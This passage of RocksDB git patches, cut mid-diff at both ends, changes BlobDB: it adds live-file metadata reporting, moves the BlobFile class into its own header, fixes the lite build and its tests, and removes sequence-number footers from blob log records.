+    filemetadata.name = blob_file->PathName();
+    auto cfh =
+        reinterpret_cast<ColumnFamilyHandleImpl*>(DefaultColumnFamily());
+    filemetadata.column_family_name = cfh->GetName();
+    metadata->emplace_back(filemetadata);
+  }
+}
+
 Status BlobDBImpl::PutWithTTL(const WriteOptions& options, const Slice& key,
                               const Slice& value, uint64_t ttl) {
diff --git a/utilities/blob_db/blob_db_impl.h b/utilities/blob_db/blob_db_impl.h
index d8dec6d4c27..a9e0c3846bc 100644
--- a/utilities/blob_db/blob_db_impl.h
+++ b/utilities/blob_db/blob_db_impl.h
@@ -227,6 +227,12 @@ class BlobDBImpl : public BlobDB {
 
   virtual Status Write(const WriteOptions& opts, WriteBatch* updates) override;
 
+  virtual Status GetLiveFiles(std::vector<std::string>&,
+                              uint64_t* manifest_file_size,
+                              bool flush_memtable = true) override;
+  virtual void GetLiveFilesMetaData(
+      std::vector<LiveFileMetaData>* ) override;
+
   using BlobDB::PutWithTTL;
   Status PutWithTTL(const WriteOptions& options, const Slice& key,
                     const Slice& value, uint64_t ttl) override;
diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc
index 3918941cfc0..9d0214effb7 100644
--- a/utilities/blob_db/blob_db_test.cc
+++ b/utilities/blob_db/blob_db_test.cc
@@ -836,6 +836,30 @@ TEST_F(BlobDBTest, ColumnFamilyNotSupported) {
   delete handle;
 }
 
+TEST_F(BlobDBTest, GetLiveFilesMetaData) {
+  Random rnd(301);
+  BlobDBOptions bdb_options;
+  bdb_options.disable_background_tasks = true;
+  Open(bdb_options);
+  std::map<std::string, std::string> data;
+  for (size_t i = 0; i < 100; i++) {
+    PutRandom("key" + ToString(i), &rnd, &data);
+  }
+  auto *bdb_impl = static_cast<BlobDBImpl*>(blob_db_);
+  std::vector<LiveFileMetaData> metadata;
+  bdb_impl->GetLiveFilesMetaData(&metadata);
+  ASSERT_EQ(1U, metadata.size());
+  std::string filename = dbname_ + "/blob_dir/000001.blob";
+  ASSERT_EQ(filename, metadata[0].name);
+  ASSERT_EQ("default", metadata[0].column_family_name);
+  std::vector<std::string> livefile;
+  uint64_t mfs;
+  bdb_impl->GetLiveFiles(livefile, &mfs, false);
+  ASSERT_EQ(4U, livefile.size());
+  ASSERT_EQ(filename, livefile[3]);
+  VerifyDB(data);
+}
+
 }  // namespace blob_db
 }  // namespace rocksdb

From dded348dda7580288e039cccd3a8b2f39b39c0f5 Mon Sep 17 00:00:00 2001
From: Yi Wu
Date: Fri, 13 Oct 2017 14:36:36 -0700
Subject: [PATCH 173/205] Blob DB: Move BlobFile definition to a separate file

Summary: simply move BlobFile definition from blob_db_impl.h to blob_file.h.
Closes https://github.com/facebook/rocksdb/pull/3002

Differential Revision: D6050143

Pulled By: yiwu-arbug

fbshipit-source-id: a8fb6e094fe39bdeace6279569834bc65aa64a34
---
 utilities/blob_db/blob_db_impl.h | 168 +--------------------
 utilities/blob_db/blob_file.cc   |  10 +-
 utilities/blob_db/blob_file.h    | 187 +++++++++++++++++++++++++++
 3 files changed, 194 insertions(+), 171 deletions(-)
 create mode 100644 utilities/blob_db/blob_file.h

diff --git a/utilities/blob_db/blob_db_impl.h b/utilities/blob_db/blob_db_impl.h
index a9e0c3846bc..6cb0d30a220 100644
--- a/utilities/blob_db/blob_db_impl.h
+++ b/utilities/blob_db/blob_db_impl.h
@@ -9,7 +9,6 @@
 #include
 #include
-#include
 #include
 #include
 #include
@@ -24,11 +23,11 @@
 #include "rocksdb/listener.h"
 #include "rocksdb/options.h"
 #include "rocksdb/wal_filter.h"
-#include "util/file_reader_writer.h"
 #include "util/mpsc.h"
 #include "util/mutexlock.h"
 #include "util/timer_queue.h"
 #include "utilities/blob_db/blob_db.h"
+#include "utilities/blob_db/blob_file.h"
 #include "utilities/blob_db/blob_log_format.h"
 #include "utilities/blob_db/blob_log_reader.h"
 #include "utilities/blob_db/blob_log_writer.h"
@@ -533,171 +532,6 @@ class BlobDBImpl : public BlobDB {
   uint32_t debug_level_;
 };
 
-class BlobFile {
-  friend class BlobDBImpl;
-  friend struct blobf_compare_ttl;
-
- private:
-  // access to parent
-  const BlobDBImpl* parent_;
-
-  // path to blob directory
-  std::string path_to_dir_;
-
-  // the id of the file.
-  // the above 2 are created during file creation and never changed
-  // after that
-  uint64_t file_number_;
-
-  // number of blobs in the file
-  std::atomic<uint64_t> blob_count_;
-
-  // the file will be selected for GC in this future epoch
-  std::atomic<int64_t> gc_epoch_;
-
-  // size of the file
-  std::atomic<uint64_t> file_size_;
-
-  // number of blobs in this particular file which have been evicted
-  uint64_t deleted_count_;
-
-  // size of deleted blobs (used by heuristic to select file for GC)
-  uint64_t deleted_size_;
-
-  BlobLogHeader header_;
-
-  // closed_ = true implies the file is no more mutable
-  // no more blobs will be appended and the footer has been written out
-  std::atomic<bool> closed_;
-
-  // has a pass of garbage collection successfully finished on this file
-  // can_be_deleted_ still needs to do iterator/snapshot checks
-  std::atomic<bool> can_be_deleted_;
-
-  // should this file been gc'd once to reconcile lost deletes/compactions
-  std::atomic<bool> gc_once_after_open_;
-
-  // et - lt of the blobs
-  ttlrange_t ttl_range_;
-
-  // et - lt of the timestamp of the KV pairs.
-  tsrange_t time_range_;
-
-  // ESN - LSN of the blobs
-  snrange_t sn_range_;
-
-  // Sequential/Append writer for blobs
-  std::shared_ptr<Writer> log_writer_;
-
-  // random access file reader for GET calls
-  std::shared_ptr<RandomAccessFileReader> ra_file_reader_;
-
-  // This Read-Write mutex is per file specific and protects
-  // all the datastructures
-  mutable port::RWMutex mutex_;
-
-  // time when the random access reader was last created.
-  std::atomic<std::time_t> last_access_;
-
-  // last time file was fsync'd/fdatasyncd
-  std::atomic<std::time_t> last_fsync_;
-
-  bool header_valid_;
-
- public:
-  BlobFile();
-
-  BlobFile(const BlobDBImpl* parent, const std::string& bdir, uint64_t fnum);
-
-  ~BlobFile();
-
-  ColumnFamilyHandle* GetColumnFamily(DB* db);
-
-  // Returns log file's pathname relative to the main db dir
-  // Eg. For a live-log-file = blob_dir/000003.blob
-  std::string PathName() const;
-
-  // Primary identifier for blob file.
-  // once the file is created, this never changes
-  uint64_t BlobFileNumber() const { return file_number_; }
-
-  // the following functions are atomic, and don't need
-  // read lock
-  uint64_t BlobCount() const {
-    return blob_count_.load(std::memory_order_acquire);
-  }
-
-  std::string DumpState() const;
-
-  // if the file has gone through GC and blobs have been relocated
-  bool Obsolete() const { return can_be_deleted_.load(); }
-
-  // if the file is not taking any more appends.
-  bool Immutable() const { return closed_.load(); }
-
-  // we will assume this is atomic
-  bool NeedsFsync(bool hard, uint64_t bytes_per_sync) const;
-
-  uint64_t GetFileSize() const {
-    return file_size_.load(std::memory_order_acquire);
-  }
-
-  // All Get functions which are not atomic, will need ReadLock on the mutex
-  tsrange_t GetTimeRange() const {
-    assert(HasTimestamp());
-    return time_range_;
-  }
-
-  ttlrange_t GetTTLRange() const { return ttl_range_; }
-
-  snrange_t GetSNRange() const { return sn_range_; }
-
-  bool HasTTL() const {
-    assert(header_valid_);
-    return header_.HasTTL();
-  }
-
-  bool HasTimestamp() const {
-    assert(header_valid_);
-    return header_.HasTimestamp();
-  }
-
-  std::shared_ptr<Writer> GetWriter() const { return log_writer_; }
-
-  void Fsync();
-
- private:
-  std::shared_ptr<Reader> OpenSequentialReader(
-      Env* env, const DBOptions& db_options,
-      const EnvOptions& env_options) const;
-
-  Status ReadFooter(BlobLogFooter* footer);
-
-  Status WriteFooterAndCloseLocked();
-
-  std::shared_ptr<RandomAccessFileReader> GetOrOpenRandomAccessReader(
-      Env* env, const EnvOptions& env_options, bool* fresh_open);
-
-  void CloseRandomAccessLocked();
-
-  // this is used, when you are reading only the footer of a
-  // previously closed file
-  Status SetFromFooterLocked(const BlobLogFooter& footer);
-
-  void set_time_range(const tsrange_t& tr) { time_range_ = tr; }
-
-  void set_ttl_range(const ttlrange_t& ttl) { ttl_range_ = ttl; }
-
-  void SetSNRange(const snrange_t& snr) { sn_range_ = snr; }
-
-  // The following functions are atomic, and don't need locks
-  void SetFileSize(uint64_t fs) { file_size_ = fs; }
-
-  void SetBlobCount(uint64_t bc) { blob_count_ = bc; }
-
-  void SetCanBeDeleted() { can_be_deleted_ = true; }
-};
-
 class BlobDBIterator : public Iterator {
  public:
   explicit BlobDBIterator(Iterator* iter, BlobDBImpl* impl, bool own_snapshot,
diff --git a/utilities/blob_db/blob_file.cc b/utilities/blob_db/blob_file.cc
index 8ba005dd6e1..dd98ed9d120 100644
--- a/utilities/blob_db/blob_file.cc
+++ b/utilities/blob_db/blob_file.cc
@@ -3,15 +3,15 @@
 // COPYING file in the root directory) and Apache 2.0 License
 // (found in the LICENSE.Apache file in the
root directory). #ifndef ROCKSDB_LITE +#include "utilities/blob_db/blob_file.h" #include -#include #include #include -#include "utilities/blob_db/blob_db_impl.h" #include "util/filename.h" #include "util/logging.h" +#include "utilities/blob_db/blob_db_impl.h" namespace rocksdb { @@ -193,8 +193,10 @@ void BlobFile::CloseRandomAccessLocked() { std::shared_ptr BlobFile::GetOrOpenRandomAccessReader( Env* env, const EnvOptions& env_options, bool* fresh_open) { *fresh_open = false; - last_access_ = - std::chrono::system_clock::to_time_t(std::chrono::system_clock::now()); + int64_t current_time = 0; + env->GetCurrentTime(¤t_time); + last_access_.store(current_time); + { ReadLock lockbfile_r(&mutex_); if (ra_file_reader_) return ra_file_reader_; diff --git a/utilities/blob_db/blob_file.h b/utilities/blob_db/blob_file.h new file mode 100644 index 00000000000..d648ddee412 --- /dev/null +++ b/utilities/blob_db/blob_file.h @@ -0,0 +1,187 @@ +// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). +#pragma once +#ifndef ROCKSDB_LITE + +#include +#include + +#include "port/port.h" +#include "rocksdb/env.h" +#include "rocksdb/options.h" +#include "util/file_reader_writer.h" +#include "utilities/blob_db/blob_log_format.h" +#include "utilities/blob_db/blob_log_writer.h" + +namespace rocksdb { +namespace blob_db { + +class BlobFile { + friend class BlobDBImpl; + friend struct blobf_compare_ttl; + + private: + // access to parent + const BlobDBImpl* parent_; + + // path to blob directory + std::string path_to_dir_; + + // the id of the file. + // the above 2 are created during file creation and never changed + // after that + uint64_t file_number_; + + // number of blobs in the file + std::atomic blob_count_; + + // the file will be selected for GC in this future epoch + std::atomic gc_epoch_; + + // size of the file + std::atomic file_size_; + + // number of blobs in this particular file which have been evicted + uint64_t deleted_count_; + + // size of deleted blobs (used by heuristic to select file for GC) + uint64_t deleted_size_; + + BlobLogHeader header_; + + // closed_ = true implies the file is no more mutable + // no more blobs will be appended and the footer has been written out + std::atomic closed_; + + // has a pass of garbage collection successfully finished on this file + // can_be_deleted_ still needs to do iterator/snapshot checks + std::atomic can_be_deleted_; + + // should this file been gc'd once to reconcile lost deletes/compactions + std::atomic gc_once_after_open_; + + // et - lt of the blobs + ttlrange_t ttl_range_; + + // et - lt of the timestamp of the KV pairs. + tsrange_t time_range_; + + // ESN - LSN of the blobs + snrange_t sn_range_; + + // Sequential/Append writer for blobs + std::shared_ptr log_writer_; + + // random access file reader for GET calls + std::shared_ptr ra_file_reader_; + + // This Read-Write mutex is per file specific and protects + // all the datastructures + mutable port::RWMutex mutex_; + + // time when the random access reader was last created. 
+ std::atomic last_access_; + + // last time file was fsync'd/fdatasyncd + std::atomic last_fsync_; + + bool header_valid_; + + public: + BlobFile(); + + BlobFile(const BlobDBImpl* parent, const std::string& bdir, uint64_t fnum); + + ~BlobFile(); + + ColumnFamilyHandle* GetColumnFamily(DB* db); + + // Returns log file's pathname relative to the main db dir + // Eg. For a live-log-file = blob_dir/000003.blob + std::string PathName() const; + + // Primary identifier for blob file. + // once the file is created, this never changes + uint64_t BlobFileNumber() const { return file_number_; } + + // the following functions are atomic, and don't need + // read lock + uint64_t BlobCount() const { + return blob_count_.load(std::memory_order_acquire); + } + + std::string DumpState() const; + + // if the file has gone through GC and blobs have been relocated + bool Obsolete() const { return can_be_deleted_.load(); } + + // if the file is not taking any more appends. + bool Immutable() const { return closed_.load(); } + + // we will assume this is atomic + bool NeedsFsync(bool hard, uint64_t bytes_per_sync) const; + + uint64_t GetFileSize() const { + return file_size_.load(std::memory_order_acquire); + } + + // All Get functions which are not atomic, will need ReadLock on the mutex + tsrange_t GetTimeRange() const { + assert(HasTimestamp()); + return time_range_; + } + + ttlrange_t GetTTLRange() const { return ttl_range_; } + + snrange_t GetSNRange() const { return sn_range_; } + + bool HasTTL() const { + assert(header_valid_); + return header_.HasTTL(); + } + + bool HasTimestamp() const { + assert(header_valid_); + return header_.HasTimestamp(); + } + + std::shared_ptr GetWriter() const { return log_writer_; } + + void Fsync(); + + private: + std::shared_ptr OpenSequentialReader( + Env* env, const DBOptions& db_options, + const EnvOptions& env_options) const; + + Status ReadFooter(BlobLogFooter* footer); + + Status WriteFooterAndCloseLocked(); + + std::shared_ptr GetOrOpenRandomAccessReader( + Env* env, const EnvOptions& env_options, bool* fresh_open); + + void CloseRandomAccessLocked(); + + // this is used, when you are reading only the footer of a + // previously closed file + Status SetFromFooterLocked(const BlobLogFooter& footer); + + void set_time_range(const tsrange_t& tr) { time_range_ = tr; } + + void set_ttl_range(const ttlrange_t& ttl) { ttl_range_ = ttl; } + + void SetSNRange(const snrange_t& snr) { sn_range_ = snr; } + + // The following functions are atomic, and don't need locks + void SetFileSize(uint64_t fs) { file_size_ = fs; } + + void SetBlobCount(uint64_t bc) { blob_count_ = bc; } + + void SetCanBeDeleted() { can_be_deleted_ = true; } +}; +} // namespace blob_db +} // namespace rocksdb +#endif // ROCKSDB_LITE From 8afb0036cacead7fdb7dd3413b49d670b39a81b0 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Tue, 17 Oct 2017 08:49:11 -0700 Subject: [PATCH 174/205] fix lite build Summary: * make `checksum_type_string_map` available for lite * comment out `FilesPerLevel` in lite mode. 
* travis and legocastle lite build also build `all` target and run tests Closes https://github.com/facebook/rocksdb/pull/3015 Differential Revision: D6069822 Pulled By: yiwu-arbug fbshipit-source-id: 9fe92ac220e711e9e6ed4e921bd25ef4314796a0 --- .travis.yml | 2 +- build_tools/rocksdb-lego-determinator | 25 +------------------------ db/db_blob_index_test.cc | 2 ++ db/db_test2.cc | 6 ++++++ options/options_helper.h | 6 +++--- 5 files changed, 13 insertions(+), 28 deletions(-) diff --git a/.travis.yml b/.travis.yml index 78e51915943..b76973d4e8e 100644 --- a/.travis.yml +++ b/.travis.yml @@ -61,7 +61,7 @@ script: - if [ "${TEST_GROUP}" == '1' ]; then OPT=-DTRAVIS V=1 ROCKSDBTESTS_START=db_block_cache_test ROCKSDBTESTS_END=comparator_db_test make -j4 check_some; fi - if [ "${TEST_GROUP}" == '2' ]; then OPT=-DTRAVIS V=1 ROCKSDBTESTS_START=comparator_db_test make -j4 check_some; fi - if [ "${JOB_NAME}" == 'java_test' ]; then OPT=-DTRAVIS V=1 make clean jclean && make rocksdbjava jtest; fi - - if [ "${JOB_NAME}" == 'lite_build' ]; then OPT="-DTRAVIS -DROCKSDB_LITE" V=1 make -j4 static_lib; fi + - if [ "${JOB_NAME}" == 'lite_build' ]; then OPT="-DTRAVIS -DROCKSDB_LITE" V=1 make -j4 static_lib tools; fi - if [ "${JOB_NAME}" == 'examples' ]; then OPT=-DTRAVIS V=1 make -j4 static_lib; cd examples; make -j4; fi - if [ "${JOB_NAME}" == 'cmake' ]; then mkdir build && cd build && cmake .. && make -j4 rocksdb; fi - if [ "${JOB_NAME}" == 'cmake-mingw' ]; then mkdir build && cd build && cmake .. -DCMAKE_C_COMPILER=x86_64-w64-mingw32-gcc -DCMAKE_CXX_COMPILER=x86_64-w64-mingw32-g++ -DCMAKE_SYSTEM_NAME=Windows && make -j4 rocksdb; fi diff --git a/build_tools/rocksdb-lego-determinator b/build_tools/rocksdb-lego-determinator index a40b3064e44..6e8ae9cd733 100755 --- a/build_tools/rocksdb-lego-determinator +++ b/build_tools/rocksdb-lego-determinator @@ -343,27 +343,7 @@ LITE_BUILD_COMMANDS="[ $CLEANUP_ENV, { 'name':'Build RocksDB debug version', - 'shell':'$LITE make J=1 static_lib || $CONTRUN_NAME=lite_static_lib $TASK_CREATION_TOOL', - 'user':'root', - $PARSER - }, - ], - $REPORT - } -]" - -# -# RocksDB lite tests -# -LITE_UNIT_TEST_COMMANDS="[ - { - 'name':'Rocksdb Lite Unit Test', - 'oncall':'$ONCALL', - 'steps': [ - $CLEANUP_ENV, - { - 'name':'Build RocksDB debug version', - 'shell':'$SHM $LITE make J=1 check || $CONTRUN_NAME=lite_check $TASK_CREATION_TOOL', + 'shell':'$LITE make J=1 all check || $CONTRUN_NAME=lite $TASK_CREATION_TOOL', 'user':'root', $PARSER }, @@ -748,9 +728,6 @@ case $1 in lite) echo $LITE_BUILD_COMMANDS ;; - lite_test) - echo $LITE_UNIT_TEST_COMMANDS - ;; stress_crash) echo $STRESS_CRASH_TEST_COMMANDS ;; diff --git a/db/db_blob_index_test.cc b/db/db_blob_index_test.cc index bfc95760c02..e71b511df5b 100644 --- a/db/db_blob_index_test.cc +++ b/db/db_blob_index_test.cc @@ -122,7 +122,9 @@ class DBBlobIndexTest : public DBTestBase { ASSERT_OK(Flush()); ASSERT_OK( dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr)); +#ifndef ROCKSDB_LITE ASSERT_EQ("0,1", FilesPerLevel()); +#endif // !ROCKSDB_LITE break; } } diff --git a/db/db_test2.cc b/db/db_test2.cc index 8f00d20e7a8..30afd5a690c 100644 --- a/db/db_test2.cc +++ b/db/db_test2.cc @@ -2315,15 +2315,21 @@ TEST_F(DBTest2, ReduceLevel) { Put("foo", "bar"); Flush(); MoveFilesToLevel(6); +#ifndef ROCKSDB_LITE ASSERT_EQ("0,0,0,0,0,0,1", FilesPerLevel()); +#endif // !ROCKSDB_LITE CompactRangeOptions compact_options; compact_options.change_level = true; compact_options.target_level = 1; dbfull()->CompactRange(compact_options, nullptr, 
nullptr); +#ifndef ROCKSDB_LITE ASSERT_EQ("0,1", FilesPerLevel()); +#endif // !ROCKSDB_LITE options.num_levels = 3; Reopen(options); +#ifndef ROCKSDB_LITE ASSERT_EQ("0,1", FilesPerLevel()); +#endif // !ROCKSDB_LITE } } // namespace rocksdb diff --git a/options/options_helper.h b/options/options_helper.h index 95861203917..67b04271ff3 100644 --- a/options/options_helper.h +++ b/options/options_helper.h @@ -42,6 +42,9 @@ static std::map {kCompactionStopStyleSimilarSize, "kCompactionStopStyleSimilarSize"}, {kCompactionStopStyleTotalSize, "kCompactionStopStyleTotalSize"}}; +static std::unordered_map checksum_type_string_map = + {{"kNoChecksum", kNoChecksum}, {"kCRC32c", kCRC32c}, {"kxxHash", kxxHash}}; + #ifndef ROCKSDB_LITE Status GetMutableOptionsFromStrings( @@ -600,9 +603,6 @@ static std::unordered_map static std::unordered_map encoding_type_string_map = {{"kPlain", kPlain}, {"kPrefix", kPrefix}}; -static std::unordered_map checksum_type_string_map = - {{"kNoChecksum", kNoChecksum}, {"kCRC32c", kCRC32c}, {"kxxHash", kxxHash}}; - static std::unordered_map compaction_style_string_map = { {"kCompactionStyleLevel", kCompactionStyleLevel}, From 419b93c56f66635ef1e14414af8b106475b9d9ea Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Tue, 17 Oct 2017 12:11:52 -0700 Subject: [PATCH 175/205] Blob DB: not writing sequence number as blob record footer Summary: Previously, each time we wrote a blob, we wrote blob_record_header + key + value + blob_record_footer to the blob log. The footer only contains a sequence number and a CRC for that sequence number. The sequence number was used by garbage collection to verify that the value is recent. After #2703 we moved to optimistic transactions and no longer use the sequence number from the footer, so remove the footer altogether. There is one other use of sequence numbers that we are keeping: each blob log file keeps track of the sequence number range of the keys in it, and uses it to check whether the file is still referenced by a snapshot before it is deleted.
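[Editor's note] To make the layout change concrete, a hedged sketch (not code from the patch; the constants mirror blob_log_format.h as shown in the hunks below):

    #include <cstdint>

    // Constants mirrored from blob_log_format.h (see the hunks below).
    constexpr uint64_t kHeaderSize = 4 + 4 + 8 + 8 + 4 + 8 + 1 + 1;
    constexpr uint64_t kOldFooterSize = 8 + 4;  // 64-bit sequence + 32-bit CRC

    // Before: every record paid for a footer on write, read, and accounting.
    uint64_t OldRecordSize(uint64_t key_size, uint64_t blob_size) {
      return kHeaderSize + key_size + blob_size + kOldFooterSize;
    }

    // After: header + key + blob only, matching the new file_size_ accounting
    // in GCFileAndUpdateLSM and FindFileAndEvictABlob.
    uint64_t NewRecordSize(uint64_t key_size, uint64_t blob_size) {
      return kHeaderSize + key_size + blob_size;
    }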
Closes https://github.com/facebook/rocksdb/pull/3005 Differential Revision: D6057585 Pulled By: yiwu-arbug fbshipit-source-id: d6da53c457a316e9723f359a1b47facfc3ffe090 --- utilities/blob_db/blob_db_impl.cc | 295 +++++++++------------------ utilities/blob_db/blob_db_impl.h | 7 +- utilities/blob_db/blob_db_test.cc | 37 ---- utilities/blob_db/blob_dump_tool.cc | 12 +- utilities/blob_db/blob_file.cc | 8 +- utilities/blob_db/blob_file.h | 5 + utilities/blob_db/blob_log_format.cc | 26 --- utilities/blob_db/blob_log_format.h | 10 - utilities/blob_db/blob_log_reader.cc | 42 +--- utilities/blob_db/blob_log_reader.h | 8 +- utilities/blob_db/blob_log_writer.cc | 33 +-- utilities/blob_db/blob_log_writer.h | 5 +- 12 files changed, 134 insertions(+), 354 deletions(-) diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index ea3e38985fe..f6c6dc6e2bc 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -47,12 +47,6 @@ void extendTimestamps(rocksdb::blob_db::tsrange_t* ts_range, uint64_t ts) { ts_range->first = std::min(ts_range->first, ts); ts_range->second = std::max(ts_range->second, ts); } - -void extendSN(rocksdb::blob_db::snrange_t* sn_range, - rocksdb::SequenceNumber sn) { - sn_range->first = std::min(sn_range->first, sn); - sn_range->second = std::max(sn_range->second, sn); -} } // end namespace namespace rocksdb { @@ -438,12 +432,10 @@ Status BlobDBImpl::OpenAllFiles() { std::numeric_limits::min()); tsrange_t ts_range(std::numeric_limits::max(), std::numeric_limits::min()); - snrange_t sn_range(std::numeric_limits::max(), - std::numeric_limits::min()); uint64_t blob_count = 0; BlobLogRecord record; - Reader::ReadLevel shallow = Reader::kReadHdrKeyFooter; + Reader::ReadLevel shallow = Reader::kReadHeaderKey; uint64_t record_start = reader->GetNextByte(); // TODO(arahut) - when we detect corruption, we should truncate @@ -455,7 +447,6 @@ Status BlobDBImpl::OpenAllFiles() { if (bfptr->HasTimestamp()) { extendTimestamps(&ts_range, record.GetTimeVal()); } - extendSN(&sn_range, record.GetSN()); record_start = reader->GetNextByte(); } @@ -473,16 +464,15 @@ Status BlobDBImpl::OpenAllFiles() { } bfptr->SetBlobCount(blob_count); - bfptr->SetSNRange(sn_range); + bfptr->SetSNRange({0, 0}); if (bfptr->HasTimestamp()) bfptr->set_time_range(ts_range); ROCKS_LOG_INFO(db_options_.info_log, "Blob File: %s blob_count: %" PRIu64 - " size_bytes: %" PRIu64 - " sn_range: (%d, %d) ts: %d ttl: %d", - bfpath.c_str(), blob_count, size_bytes, sn_range.first, - sn_range.second, bfptr->HasTimestamp(), bfptr->HasTTL()); + " size_bytes: %" PRIu64 " ts: %d ttl: %d", + bfpath.c_str(), blob_count, size_bytes, + bfptr->HasTimestamp(), bfptr->HasTTL()); if (bfptr->HasTTL()) { ttl_range.second = @@ -566,11 +556,11 @@ Status BlobDBImpl::CreateWriterLocked(const std::shared_ptr& bfile) { } Writer::ElemType et = Writer::kEtNone; - if (bfile->file_size_ == BlobLogHeader::kHeaderSize) + if (bfile->file_size_ == BlobLogHeader::kHeaderSize) { et = Writer::kEtFileHdr; - else if (bfile->file_size_ > BlobLogHeader::kHeaderSize) - et = Writer::kEtFooter; - else if (bfile->file_size_) { + } else if (bfile->file_size_ > BlobLogHeader::kHeaderSize) { + et = Writer::kEtRecord; + } else if (bfile->file_size_) { ROCKS_LOG_WARN(db_options_.info_log, "Open blob file: %s with wrong size: %d", fpath.c_str(), boffset); @@ -772,14 +762,13 @@ Status BlobDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { BlobDBImpl* impl_; SequenceNumber sequence_; WriteBatch updates_blob_; - 
Status batch_rewrite_status_; std::shared_ptr last_file_; bool has_put_; std::string new_value_; uint32_t default_cf_id_; public: - explicit BlobInserter(BlobDBImpl* impl, SequenceNumber seq) + BlobInserter(BlobDBImpl* impl, SequenceNumber seq) : impl_(impl), sequence_(seq), has_put_(false), @@ -788,9 +777,9 @@ Status BlobDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { ->cfd() ->GetID()) {} - WriteBatch& updates_blob() { return updates_blob_; } + SequenceNumber sequence() { return sequence_; } - Status batch_rewrite_status() { return batch_rewrite_status_; } + WriteBatch* updates_blob() { return &updates_blob_; } std::shared_ptr& last_file() { return last_file_; } @@ -799,9 +788,8 @@ Status BlobDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { virtual Status PutCF(uint32_t column_family_id, const Slice& key, const Slice& value_slice) override { if (column_family_id != default_cf_id_) { - batch_rewrite_status_ = Status::NotSupported( + return Status::NotSupported( "Blob DB doesn't support non-default column family."); - return batch_rewrite_status_; } Slice value_unc; uint64_t expiration = @@ -812,13 +800,11 @@ Status BlobDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { ? impl_->SelectBlobFileTTL(expiration) : ((last_file_) ? last_file_ : impl_->SelectBlobFile()); if (last_file_ && last_file_ != bfile) { - batch_rewrite_status_ = Status::NotFound("too many blob files"); - return batch_rewrite_status_; + return Status::NotFound("too many blob files"); } if (!bfile) { - batch_rewrite_status_ = Status::NotFound("blob file not found"); - return batch_rewrite_status_; + return Status::NotFound("blob file not found"); } last_file_ = bfile; @@ -830,31 +816,26 @@ Status BlobDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { std::string headerbuf; Writer::ConstructBlobHeader(&headerbuf, key, value, expiration, -1); std::string index_entry; - Status st = impl_->AppendBlob(bfile, headerbuf, key, value, &index_entry); - if (st.ok()) { - impl_->AppendSN(last_file_, sequence_); - sequence_++; + Status s = impl_->AppendBlob(bfile, headerbuf, key, value, &index_entry); + if (!s.ok()) { + return s; } + bfile->ExtendSequenceRange(sequence_); + sequence_++; if (expiration != kNoExpiration) { extendTTL(&(bfile->ttl_range_), expiration); } - if (!st.ok()) { - batch_rewrite_status_ = st; - } else { - WriteBatchInternal::Put(&updates_blob_, column_family_id, key, - index_entry); - } - return Status::OK(); + return WriteBatchInternal::Put(&updates_blob_, column_family_id, key, + index_entry); } virtual Status DeleteCF(uint32_t column_family_id, const Slice& key) override { if (column_family_id != default_cf_id_) { - batch_rewrite_status_ = Status::NotSupported( + return Status::NotSupported( "Blob DB doesn't support non-default column family."); - return batch_rewrite_status_; } WriteBatchInternal::Delete(&updates_blob_, column_family_id, key); sequence_++; @@ -864,27 +845,23 @@ Status BlobDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { virtual Status DeleteRange(uint32_t column_family_id, const Slice& begin_key, const Slice& end_key) { if (column_family_id != default_cf_id_) { - batch_rewrite_status_ = Status::NotSupported( + return Status::NotSupported( "Blob DB doesn't support non-default column family."); - return batch_rewrite_status_; } WriteBatchInternal::DeleteRange(&updates_blob_, column_family_id, begin_key, end_key); + sequence_++; return Status::OK(); } virtual Status SingleDeleteCF(uint32_t /*column_family_id*/, const Slice& /*key*/) 
override { - batch_rewrite_status_ = - Status::NotSupported("Not supported operation in blob db."); - return batch_rewrite_status_; + return Status::NotSupported("Not supported operation in blob db."); } virtual Status MergeCF(uint32_t /*column_family_id*/, const Slice& /*key*/, const Slice& /*value*/) override { - batch_rewrite_status_ = - Status::NotSupported("Not supported operation in blob db."); - return batch_rewrite_status_; + return Status::NotSupported("Not supported operation in blob db."); } virtual void LogData(const Slice& blob) override { @@ -894,19 +871,20 @@ Status BlobDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { MutexLock l(&write_mutex_); - SequenceNumber sequence = db_impl_->GetLatestSequenceNumber() + 1; - BlobInserter blob_inserter(this, sequence); - updates->Iterate(&blob_inserter); - - if (!blob_inserter.batch_rewrite_status().ok()) { - return blob_inserter.batch_rewrite_status(); + SequenceNumber current_seq = db_impl_->GetLatestSequenceNumber() + 1; + BlobInserter blob_inserter(this, current_seq); + Status s = updates->Iterate(&blob_inserter); + if (!s.ok()) { + return s; } - - Status s = db_->Write(opts, &(blob_inserter.updates_blob())); + s = db_->Write(opts, blob_inserter.updates_blob()); if (!s.ok()) { return s; } - + assert(current_seq == + WriteBatchInternal::Sequence(blob_inserter.updates_blob())); + assert(blob_inserter.sequence() == + current_seq + WriteBatchInternal::Count(blob_inserter.updates_blob())); if (blob_inserter.has_put()) { s = CloseBlobFileIfNeeded(blob_inserter.last_file()); if (!s.ok()) { @@ -942,7 +920,7 @@ Status BlobDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { }; // add deleted key to list of keys that have been deleted for book-keeping - DeleteBookkeeper delete_bookkeeper(this, sequence); + DeleteBookkeeper delete_bookkeeper(this, current_seq); updates->Iterate(&delete_bookkeeper); return Status::OK(); @@ -1051,20 +1029,7 @@ Status BlobDBImpl::PutUntil(const WriteOptions& options, const Slice& key, // this is the sequence number of the write. 
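// [Editor's note, illustrative] The BlobInserter rewrite above drops the
// batch_rewrite_status_ side channel: each handler callback now returns its
// error directly, and WriteBatch::Iterate stops at the first non-OK status,
// so the caller reduces to:
//
//   BlobInserter blob_inserter(this, current_seq);
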